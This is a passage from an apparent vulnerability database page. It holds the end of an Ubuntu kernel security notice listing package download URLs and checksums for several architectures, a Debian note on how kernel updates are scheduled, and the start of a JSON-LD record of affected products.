  Size/MD5:  1495010 630f37fe420a74a22b4ca2eba4960999
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    44088 fddf56b0285ec3d0e6fc61e0fe8b86e2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    48484 2614a20d6d57892a8789091eeeaa67b3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   117810 ff004889bca11286287a59c36fa24c0e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    14526 4c9cb3d5598c843bf5b90ddf0292d3c1

lpia architecture (Low Power Intel Architecture):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   198810 76156647956f29c9e519aeac038c63bb
http://ports.ubuntu.com/pool/main/l/linux/char-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    32452 9a5dd5fe15dda0be28f7afd966e89af9
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    49936 31c4008b50016b2a6c3a90703f2becbb
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    42148 931518b24b123d3749719c35b2b23759
http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    45950 297c686f52a35049b3b2c87a96aebf68
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    87366 ec3f16cc0aeeef91b8c887ff347b6b0a
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    33750 a29ddd339c071c5b948c96e30f36f650
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   534366 b15b19f3e6c581d22514700dbd6502d8
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   128202 3d0f559a80187074bb210e3dae3bbfa0
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    49732 41abb7e30f0bdac62c5cd064c4b0ac3e
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   295732 12e912ce1f15d580960e7956de0c4ae0
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:  4186814 7c18e86a3f5a5a985488ad67718887f9
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-lpia_2.6.31-19.56_lpia.deb
  Size/MD5:   674880 5dd2779cd5be613c330b7dc35410f271
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-lpia_2.6.31-19.56_lpia.deb
  Size/MD5: 28831528 8eaab1870eda62e8ee231e429c361455
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_lpia.deb
  Size/MD5:   742994 99d2d0609d9032e2810e19c92fc92834
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   172836 8b15eb5579853f45dc49055351df4225
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   186092 0eb0ceb5c23748d829f3e1d7977a35be
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    28366 0301ac544cf27b3dce660787d7575804
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   292736 16e84844c99e73b4e00419c38d78db3d
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:  2400366 43dda8f1a10775e382e7a328381265db
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   141998 930123e6b57798468d7085ae9f549150
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   189564 8d6e18aedb4b970a3643207b96589863
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   148506 78efdbf1323c68be564ad06205842cb6
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    35300 054cf95e7af87d6f744b69eb8166f275
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:     6828 5dbf32d40e88f471614e5cf286670e8f
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    86054 f24e7eaa3608985960e54a9048a24fb6
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    46410 80945eba79f53965effd546d23a8560b
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:     8906 e1c6021a615a4363dde2cf4a893fa53b
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    36270 eb2848e19ec2351b9102bc640e546991
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    21660 cfb271e26dfd127871f5d27547e0a7ba
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:  1494736 44113d529e3f4d3828f8719facd86370
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    44068 98817942a8188bd9281def20a1d327bb
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    48474 ebc9e58b5f98182006d6e3bb9c5ce179
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   117786 9b864dfc32d19a8cf2d61a68894835e9
http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    14524 9ad51e3871197eb84b193bd9a3b29ec2

powerpc architecture (Apple Macintosh G3/G4/G5):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   321488 509ad8549565d0d87fe246df5b26c7af
http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   263628 b7028cc16ec749cc2fdd86e985c7bc6a
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    58850 3e2f18df29a75debc326e5919c9c13da
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    67040 8fdde64943d01e5c6a372424d3d24a03
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    45914 6a21bb6fc6dce2767be6f974ffdab524
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    51296 4c928d4f04bf96f5cdc5ccf7d3a60c81
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    90684 eac2ea55da023924723593afffbb5d2c
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   105146 c407a156a5e56f284fa682d87d2ed50e
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    39492 38f377d5a0bdbbbb642545aa6d7f641c
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    39270 47f890e2a1418595d92858350aa16475
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   580998 825045ff82a442eaf1a21a5448b0cefb
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   626388 b56b5416b642ba57471e6e125b99a32f
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   149292 930001a305b0f78060f3472fe46cde00
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   147332 ef6994c30f19462a7fc0cb7cd8f4dacc
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    79750 75c6da2308e05334f89f62917aee5b3d
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    84136 caf2a7e924b03340e579e9bdc0a7ba50
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   402954 9fc3d4860f5c32aff3ac252379938fef
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   342516 5737df8ea2adfc45ecae9d322931187a
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:  3813204 3ac91a51b3525bfbb0f6166fc140d7db
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:  5193132 54dce7348221bcc93bbc01512d553a16
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc-smp_2.6.31-19.56_powerpc.deb
  Size/MD5:   784762 523b94315bff20137df79c5308abd5b7
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc64-smp_2.6.31-19.56_powerpc.deb
  Size/MD5:   801042 2a8e55b23ad4dc09ee3cbb2fdc23cc28
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc_2.6.31-19.56_powerpc.deb
  Size/MD5:   783708 185ba99656f4fa37874e0241e9f25dbb
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc-smp_2.6.31-19.56_powerpc.deb
  Size/MD5: 24820746 adc5365726ba88565ad89953707bd012
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc64-smp_2.6.31-19.56_powerpc.deb
  Size/MD5: 25829918 fc82da730c6d730c5a4ac87d30594749
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc_2.6.31-19.56_powerpc.deb
  Size/MD5: 24656226 7791f88107e97c5419f0e2d2f850c38e
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_powerpc.deb
  Size/MD5:   728146 1dabe36864839475aab9293825cfc3e4
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   271924 8fb200d91f158f9b0eb209df5a5ffcd4
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   294610 317f7d34e3cd0ac823fcc5d48bcc9a7f
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   210546 041508a9555e18e2b8b4cab41b26f397
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   216984 845e2e452ef869aa3b39ea47bfa0280b
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    25798 19a7cae7e4f693c269f54dc0f2762f33
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    28984 419926b33e2b573f8d3ccaa5ade657f1
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   314922 83dcb63807ffb50682219b20333c23bc
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   357524 a32753bfca44b1afb9b11f72b25ebb9e
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:  2027754 9b45ff8446ec0bad5befec2dc3ecdb72
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:  2247744 35d212f7569bb03564a7f0294879557f
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   213544 3fb9afb7247290ffb3508744ab6cbb9f
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   209776 e42b20eb402cb2a55fea2a80f5cef162
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   210242 78939115c860efacb83481c0687f1a7a
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   244856 8fcff5fb05c0921681ec2bb44637c624
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   111834 a6b65e618a3240d51f36f37911d1d7cc
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   131610 dc5625deacbac446e71517f5902376b1
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    49028 ac60e4bf193e7725de6d8999c6231915
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    44082 531b2cbe15ec2f62fe61bd7002b1df02
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:     5852 f049a9332d469b247e451868b4f22cce
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:     6504 32fb4de3cd714598281c2d4d5d2ee6d6
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    79118 e98cffbfe6f6cbffcfa6dce199dc6c46
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    85190 e648dc2d3e124d68c47d4ec18836097f
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    74318 19b737ad1f43e7be1c6cc7e211085424
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    27228 0b5b4529d140289e616bded832055cbc
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:     8538 9010c080bd63660bf529930565d49f62
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:     9818 e909c37d26354ddbdceddc72628d71b3
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    58830 ae6573a0664b5486360156dd6711776c
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    70140 83085dfd5f4bb24ab67dd967e6b609cc
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    23714 86a598e1b13e4d6963475732e7a1097a
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    30804 b382bc0bfffd61156d0f8b3dc90bd307
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:  1556894 ea2800c85a0115ad2e524a8b4ab4cb91
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:  1509110 e42499f8bdbad020301a11617f6b65a8
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    81698 095ff78875bae0b90edd07ac3b51993d
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    88530 1a36ce88a0c6f7b495c869da15bf9d69
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    64400 8ff9a2aef998409440c1139f3db8c7ee
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    76990 392faa17f8c688e3856d91fb657eba09
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   141540 636e6d1827591a3aa46b82d7dc0b8ab6
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   151356 0f39f4d13770ceab049be6fb9c83fc16

sparc architecture (Sun SPARC/UltraSPARC):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   139430 14f825a3334b18614059312527002767
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    70106 6dde178febff58a546142209374e1616
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    46510 64b0be995ce3d697a84cd3b0665ffe68
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    93974 28048300aba15f2a3937723bc0afc5cd
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   588788 c17e7feb3442296b7ed93c92cb988625
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   148426 6f429deb9df760daf28c04ad93ea6758
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    75862 6f382de52d9e1b52611c70a703895e5d
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:  2892370 ec9440bb8ee05a7ac071992c5711139f
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-sparc64-smp_2.6.31-19.56_sparc.deb
  Size/MD5:   601506 1b56c59b3df953a640760b876d752465
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-sparc64_2.6.31-19.56_sparc.deb
  Size/MD5:   600680 166e5056f971d5fa031230c1af67d028
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-sparc64-smp_2.6.31-19.56_sparc.deb
  Size/MD5: 20496992 6ebab55c96d6be71ffb8c3a493d31a74
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-sparc64_2.6.31-19.56_sparc.deb
  Size/MD5: 20193918 98b3c6e44f8e302cca36530b434e9525
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_sparc.deb
  Size/MD5:   740254 b1a453339b4d68717a445f07b87b53a4
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   266068 1b8caecb838a9dd9b9c765f6603197a3
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   209168 e0e78f6a435e0ca46d5680e08d6e8db0
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    26268 f730be03c2b96e53e779a5d3df4cde93
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   314080 b673ee07d0c907d6ba00a561b915868d
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:  1675490 8642bd711b6643bd26ddc80674cef9e4
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   222882 136f6b9e24a16823f7309438fd0bd60a
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   121954 75090ea655204cc898db4634fc8aa021
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    38798 a11bcf765626194255c1d5a7d0106c2a
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   100798 af5903bc65fd381528f733fb1ba4100f
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:     8932 ebcb23a73a538276e41fcff9b7bb1d15
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    62926 7eba529ee44c2e107b693605dcbf1247
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   120960 8f63ad112de0797974650631dee53d13
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:  1217912 87a2a4f21ee86e0f36bc5298a226513b
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   101576 057a15ca3fa891e47216adcf5ae071f7
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   200148 f90834ae24c0f516ef83fa5aa66bafbb
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   184674 d704744a26941df63b9195288306fa7b

.

Note: Debian carefully tracks all known security issues across every linux kernel package in all releases under active security support. However, given the high frequency at which low-severity security issues are discovered in the kernel and the resource requirements of doing an update, updates for lower priority issues will normally not be released for all kernels at the same time. Rather, they will be released in a staggered or "leap-frog" fashion

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201001-0692",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.8,
        "vendor": "linux",
        "version": "2.6.32.4"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "linux",
        "version": "2.6.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "esx",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "vmware",
        "version": "3.0.3"
      },
      {
        "model": "esx",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "vmware",
        "version": "3.5"
      },
      {
        "model": "esx",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "esx",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "vmware",
        "version": "4.1"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3 (x86)"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3 (x86-64)"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "4.0"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
